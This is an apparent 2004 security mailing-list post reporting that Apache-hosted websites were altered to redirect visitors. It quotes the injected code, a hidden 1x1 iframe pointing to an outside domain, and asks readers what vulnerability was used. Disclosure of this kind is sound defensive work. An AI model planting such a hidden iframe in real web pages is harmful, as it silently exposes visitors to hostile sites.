[Full-Disclosure] browser hijack by apache sites
From: Filbert (filbert_at_pandora.be)
Date: 05/23/04
- Previous message: Thierry Carrez: "[Full-Disclosure] [ GLSA 200405-18 ] Buffer Overflow in Firebird"
- Next in thread: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: D B: "Re: [Full-Disclosure] browser hijack by apache sites"
- Maybe reply: Ian Latter: "Re:[Full-Disclosure] browser hijack by apache sites"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: full-disclosure@lists.netsys.com
Date: Sun, 23 May 2004 15:19:30 +0200
Hi,
This is the second time this weekend that I've been warned of an Apache site
on a Linux server where a line of code was added to redirect browsers to porn
sites.
First was the site of a Belgian political party. Second came today, and as of
writing this it's still there. The admin was informed so it can be gone soon.
hxxp://www.previsit.com/carrefour/nl/ <- hxxp must be changed to http
IE users do NOT click.
The code added at the bottom is:
<iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1
HEIGHT=1></iframe></body>
Anyone seen this before? What vulnerability is exploited here? FP?
Thx,
Filb.
--
echo "+++ATH0filb@+++ATH0filb@linuxmail.org" | sed 's/+++ATH0//g'
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html